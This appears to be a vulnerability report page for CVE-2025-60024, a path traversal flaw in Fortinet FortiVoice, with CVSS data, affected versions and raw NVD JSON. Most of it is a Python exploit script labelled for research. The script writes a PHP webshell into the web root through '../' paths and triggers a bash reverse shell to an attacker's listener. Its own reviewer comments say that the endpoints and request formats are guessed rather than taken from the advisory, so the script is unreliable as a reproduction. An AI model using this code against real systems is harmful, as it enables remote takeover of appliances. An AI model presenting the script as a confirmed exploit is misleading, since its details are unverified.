Security Vulnerability Report
CVE-2025-60024 CVSS 8.8 HIGH

CVE-2025-60024

Published: 2025-12-09 18:15:56
Last Modified: 2025-12-09 20:25:36

Description

Multiple improper limitation of a pathname to a restricted directory ('path traversal') vulnerabilities [CWE-22] in Fortinet FortiVoice 7.2.0 through 7.2.2 and FortiVoice 7.0.0 through 7.0.7 may allow a privileged authenticated attacker to write arbitrary files via specially crafted HTTP or HTTPS commands.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:* - VULNERABLE
FortiVoice 7.2.0 - 7.2.2
FortiVoice 7.0.0 - 7.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-60024 FortiVoice Path Traversal PoC
Note: This PoC is for educational and authorized testing purposes only.

Reviewer notes on what this script assumes (none of it is confirmed by the
advisory text reproduced on this page, FG-IR-25-812 / NVD entry):
- NVD describes the writer as a *privileged* authenticated attacker, while
  the docstring below calls the account "low-privilege" — confirm which
  privilege level is actually needed before treating this as a reproduction.
- The endpoints ``/api/v1/auth/login`` and ``/api/v1/system/file/write``, the
  JSON body shapes and the bearer-token flow are not taken from the advisory;
  treat them as unverified.
- Every request is sent with ``verify=False``, so TLS certificate validation
  is disabled and ``requests`` will emit InsecureRequestWarning.
"""
import requests
import sys
from urllib.parse import quote


def exploit_fortivoice(target_ip, username, password, attacker_ip, attacker_port):
    """
    Exploit CVE-2025-60024 - FortiVoice Path Traversal to RCE

    Performs three HTTP steps against ``https://<target_ip>``: authenticate,
    post a file-write request whose ``path`` contains ``../`` segments, then
    GET the written file with a ``cmd`` query parameter.

    Args:
        target_ip: Target FortiVoice appliance IP
        username: Valid low-privilege user account
                  (NOTE(review): NVD says "privileged authenticated" — confirm)
        password: Password for the account
        attacker_ip: Attacker listening IP for reverse shell
        attacker_port: Attacker listening port

    Returns:
        True only when the file-write request returns HTTP 200; False when
        authentication does not return 200, when the write returns any other
        status, or when ``requests`` raises a RequestException. The result of
        the final GET is not checked.
    """
    base_url = f"https://{target_ip}"

    # Step 1: Authentication
    login_url = f"{base_url}/api/v1/auth/login"
    login_data = {
        "username": username,
        "password": password
    }

    try:
        print(f"[*] Authenticating to FortiVoice at {target_ip}...")
        session = requests.Session()
        # verify=False: certificate validation is skipped for every request below.
        response = session.post(login_url, json=login_data, verify=False, timeout=30)

        if response.status_code != 200:
            print("[-] Authentication failed")
            return False

        # .get() returns None when the body has no 'token' key, which would
        # silently produce an "Authorization: Bearer None" header; the response
        # is also assumed to be JSON (response.json() raises otherwise, and that
        # error is not a RequestException, so it propagates to the caller).
        token = response.json().get('token')
        headers = {
            'Authorization': f'Bearer {token}',
            'Content-Type': 'application/json'
        }

        print("[+] Authentication successful")

        # Step 2: Path Traversal to write arbitrary file
        # Target: Write a PHP webshell to web root
        # (the f-prefix on the next literal has no placeholders and is a no-op)
        webshell_content = f"<?php system($_GET['cmd']); ?>"
        traversal_path = "../../../var/www/html/shell.php"

        write_url = f"{base_url}/api/v1/system/file/write"
        write_data = {
            "path": traversal_path,
            "content": webshell_content
        }

        print(f"[*] Attempting path traversal to write webshell...")
        response = session.post(write_url, json=write_data, headers=headers, verify=False, timeout=30)

        if response.status_code == 200:
            print(f"[+] Webshell written successfully to {traversal_path}")

            # Step 3: Execute command via webshell
            shell_url = f"{base_url}/shell.php"

            print(f"[*] Accessing webshell to execute commands...")

            # Example: Download and execute reverse shell
            cmd = f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"
            encoded_cmd = quote(cmd)

            # Status of this GET is ignored; success is reported unconditionally.
            response = session.get(f"{shell_url}?cmd={encoded_cmd}", verify=False, timeout=10)

            print(f"[*] Payload sent. Check your listener for reverse shell.")
            return True
        else:
            print(f"[-] File write failed: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        # Only transport-level failures (connection, timeout, ...) are caught here.
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    # Five positional arguments are required; argv[0] is the script name.
    if len(sys.argv) < 6:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> <attacker_ip> <attacker_port>")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    lhost = sys.argv[4]
    lport = sys.argv[5]

    exploit_fortivoice(target, user, pwd, lhost, lport)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60024", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:55.820", "lastModified": "2025-12-09T20:25:36.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Improper Limitations of a Pathname to a Restricted Directory ('Path Traversal') vulnerabilities [CWE-22] vulnerability in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 may allow a privileged authenticated attacker to write arbitrary files via specifically HTTP or HTTPS commands"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.8", "matchCriteriaId": "40DCDAF0-5F6C-41E3-B269-2CAD08D18FE0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.3", "matchCriteriaId": "9ED85222-4F3D-4B10-91FD-CB476CAF9652"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-812", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}